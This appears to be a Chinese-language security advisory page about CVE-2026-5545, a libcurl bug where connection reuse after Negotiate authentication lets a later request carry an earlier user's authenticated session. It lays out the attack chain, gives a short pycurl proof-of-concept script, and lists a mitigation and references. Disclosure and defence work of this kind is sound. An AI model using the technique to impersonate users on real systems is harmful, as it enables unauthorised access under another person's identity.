CVE-2026-5545 CVSS 6.5 中危

CVE-2026-5545 libcurl连接复用认证绕过漏洞

披露日期: 2026-05-13

来源: 2499f714-1537-4658-8207-48ae4bb9eae9

漏洞信息

漏洞编号

CVE-2026-5545

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

libcurl

漏洞概述

libcurl在处理经过身份验证的HTTP(S)请求时存在逻辑漏洞。当应用程序先使用Negotiate认证建立连接，随后在同一服务器上使用不同凭证发起后续请求时，libcurl可能错误地复用旧的连接。这导致新请求实际上使用了前一个用户的凭证进行操作，从而引发认证绕过和权限提升风险。

技术细节

该漏洞源于libcurl连接池管理逻辑中的严重缺陷。为了优化性能，libcurl维护了一个连接池供后续请求复用，但这要求认证上下文必须一致。漏洞核心在于：当应用程序首次使用user1的凭证通过Negotiate认证连接服务器后，该连接被保留在池中。若随后应用程序尝试使用user2的凭证向同一主机发起请求时，libcurl内部的匹配逻辑出现错误，未能识别出认证凭证的差异，从而错误地复用了属于user1的连接。结果是，本应代表user2发起的请求，实际上在已认证为user1的通道上传输。这导致了凭证混淆，攻击者可能利用此特性绕过身份校验，以其他用户身份执行操作，破坏了系统的安全边界。

攻击链分析

STEP 1

步骤1

应用程序使用user1的凭证通过Negotiate认证与目标服务器建立连接，连接被放入连接池。

STEP 2

步骤2

应用程序尝试向同一服务器发起第二次请求，此次请求使用user2的凭证，并可能指定不同的认证方法（如Basic）。

STEP 3

步骤3

libcurl在处理第二次请求时，由于代码逻辑错误，错误匹配并复用了步骤1中已认证为user1的连接。

STEP 4

步骤4

第二次请求的数据包通过user1的连接发送，服务器将其视为user1的操作，导致权限混淆或绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pycurl
from io import BytesIO

# Simulate the vulnerable scenario
buffer = BytesIO()
c = pycurl.Curl()

# Step 1: First request with Negotiate Auth (User1)
c.setopt(c.URL, 'https://example.com/resource')
c.setopt(c.HTTPAUTH, pycurl.HTTPAUTH_NEGOTIATE)
c.setopt(c.USERPWD, 'user1:password1')
c.setopt(c.WRITEDATA, buffer)
c.perform()

print("Request 1 sent with User1 credentials.")

# Step 2: Second request with different auth (User2)
# In vulnerable versions, this might reuse the connection from Step 1
c.setopt(c.USERPWD, 'user2:password2')
c.setopt(c.HTTPAUTH, pycurl.HTTPAUTH_BASIC) # Switch to Basic or other
buffer.seek(0)
c.setopt(c.WRITEDATA, buffer)
c.perform()

print("Request 2 sent. If vulnerable, it used User1's connection.")
c.close()

影响范围

libcurl (具体受影响版本未在输入信息中明确列出)

防御指南

临时缓解措施

建议在无法立即升级libcurl的情况下，避免在同一应用程序逻辑中混合使用不同凭证对同一服务器进行认证请求，或者在每次认证请求完成后强制关闭连接（如设置CURLOPT_FORBID_REUSE）以防止连接复用导致的凭证混淆。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5545
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5545
3 Details https://www.cvedetails.com/cve/CVE-2026-5545/
4 VulDB https://vuldb.com/cve/CVE-2026-5545
5 Link https://curl.se/docs/CVE-2026-5545.html
6 Link https://curl.se/docs/CVE-2026-5545.json
7 Link https://hackerone.com/reports/3642555
8 Link https://hackerone.com/reports/3642555

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表